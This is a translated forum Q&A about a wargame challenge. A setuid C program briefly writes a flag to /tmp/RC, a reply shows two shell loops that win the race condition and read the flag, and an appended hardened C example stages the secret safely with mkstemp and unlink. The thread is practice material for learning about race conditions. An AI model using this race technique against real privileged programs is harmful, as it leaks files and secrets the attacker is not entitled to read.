   ewqqw
   Privilege escalation using setuid

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_linux&no=4453


Is there a way to trigger this program's fget function while running ./rc?

If I only run ./rc, /tmp/RC just disappears and that is the end of it...

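#include <stdio.h>
#include <stdlib.h>

int main() {
        FILE *fp,*fo;
        char key[40] = "";

        /* remove any stale copy left in /tmp */
        system("rm /tmp/RC");

        fo=fopen("/home/rc/flag","r");   /* the original flag */
        fp=fopen("/tmp/RC","w");         /* fixed, predictable path in /tmp */

        if(!fo) {
                printf("failed to open flag ask to admin\n");
                return 1;                /* do not go on with a NULL stream */
        }
        if(!fp) {
                printf("failed to open RC file ask to admin\n");
                return 1;
        }

        fgets(key,40,fo);
        fprintf(fp,"%s\n",key);

        fclose(fp);
        fclose(fo);

        /* /tmp/RC holds the key from fclose() until this rm runs */
        system("rm /tmp/RC");

        return 0;
}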

  Hit : 2347     Date : 2017/03/29 02:14



    
해쿨러  The third argument of fgets is fp, and what went into fp is fopen("flag"), not stdin.
It keeps creating the flag file, writing the key, and deleting it, over and over.
The original flag is in /home/rc/flag, and it keeps writing that to /tmp/RC and deleting it, writing and deleting.
This is a typical race condition problem. Leave
while [ 1 ] ; do ./rc; done
running, and in another terminal leave
while [ 1 ] ; do cat /tmp/RC; done
running, and the flag will come out in the second terminal.
2017/03/29
ewqqw  So you get setuid by digging into the gap between the two commands.... Thank you  2017/03/29
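
The window used in the answer above exists because the key is written to a fixed name in /tmp that other users can read under the usual umask, and is only removed afterwards. A hardened way to stage the same data, as an added example that is not part of the original thread or the wargame's code; stage_secret() and the /tmp/rc-XXXXXX template are assumed names:

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* stage_secret() is a hypothetical helper, not part of the program above.
 * It writes key to a scratch file that no other user can open by name:
 *   - mkstemp() picks a random name and creates it with O_EXCL, mode 0600
 *   - unlink() drops the name BEFORE the secret is written
 * Returns an open descriptor (caller closes it) or -1 on error.
 * name_out receives the already-removed path, for logging only. */
int stage_secret(const char *key, char *name_out, size_t name_len)
{
    char path[] = "/tmp/rc-XXXXXX";     /* constructed template */
    size_t len = strlen(key);
    mode_t old = umask(077);            /* belt and braces for old libcs */
    int fd = mkstemp(path);
    umask(old);
    if (fd < 0)
        return -1;
    if (unlink(path) != 0 || write(fd, key, len) != (ssize_t)len) {
        close(fd);
        return -1;
    }
    snprintf(name_out, name_len, "%s", path);
    return fd;
}

int main(void)
{
    char name[32];
    int fd = stage_secret("constructed-key\n", name, sizeof name);
    if (fd < 0) {
        perror("stage_secret");
        return 1;
    }
    /* The data is reachable only through fd; the path is already gone. */
    printf("%s exists: %s\n", name, access(name, F_OK) == 0 ? "yes" : "no");
    close(fd);                          /* storage is released here */
    return 0;
}
```

With this layout a loop that keeps reading a path in /tmp has nothing to open: the name is random, owner-only, and removed before any secret byte is written.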